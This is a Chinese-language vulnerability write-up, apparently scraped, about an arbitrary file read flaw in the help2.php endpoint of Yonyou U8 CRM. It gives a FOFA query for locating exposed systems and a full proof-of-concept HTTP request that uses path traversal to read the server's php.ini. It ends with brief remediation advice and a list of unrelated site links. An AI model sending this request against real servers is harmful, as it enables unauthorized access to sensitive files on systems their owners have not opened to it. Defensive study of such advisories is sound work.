当前位置: 首页 > news >正文

胖咯科技 网站建设wordpress 所有漏洞汇总

胖咯科技 网站建设,wordpress 所有漏洞汇总,百度seo优化多少钱,黄石网站制作公司0x01 产品简介 用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。 0x02 漏洞概述 用友 U8 CRM客户关系管理系统 help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服…

0x01 产品简介

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

0x02 漏洞概述

用友 U8 CRM客户关系管理系统 help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息。

0x03 复现环境

FOFA:title="用友U8CRM"

0x04 漏洞复现

PoC

GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

http://www.yayakq.cn/news/46055/

相关文章:

  • wordpress访问过的页码不变色seo模板建站
  • 晋江网站建设报价wordpress文章选项卡
  • 沈阳市住房和城乡建设局网站wordpress 提问
  • 免费自建网站步骤wordpress调整页面布局
  • 哪个网站做头像比较好艺术字体在线生成器免费转换器
  • 网站不被百度收录微信营销和网站建设
  • 建设银行官方网站手机版下载h5开发app用什么工具好
  • 嘉兴网站设计公司海口网站建设加q.479185700
  • 如何在自己的网站上做直播成都百度seo优化公司
  • 页面设计好看的网站做网站阿里云买哪个服务器好点
  • 做网站找哪家好思南招聘网站如何做运营
  • 网站后台做的超链接打不开网站建设工具哪家好
  • 北湖区网站建设服务商教育网站建设备案
  • 做网站用源码品牌型网站有哪些
  • 建网站的网站江西营销网站建设
  • 网站制作400哪家好在哪里看片可以免费
  • 网站开发工作容易出现的失误网络设计的基本原则有哪些
  • 新站优化开发app多少钱费用
  • 厦门网站建设方案优化公众号助手
  • 杭州网站建设哪家比较好做外贸网站可以收付款吗
  • 宁夏建设厅招标网站网页设计与制作设计报告
  • 建设局网站管理办法怎么免费申请网站
  • 做外贸怎么上国外网站如何在mysql数据库里修改网站后台管理的登录密码
  • 做亚马逊产品测评的网站微软做网站
  • 建设纺织原料网站开一个网站建设公司需要什么
  • 个人做的卖货网站网站建设公司佛山
  • 北京企业信用信息网官网北京seo关键词优化收费
  • 重庆 网站开发wordpress制作婚礼网页
  • 连云港做网站企业wordpress 翻页函数
  • 建设网站还要云服务器吗市场营销策略都有哪些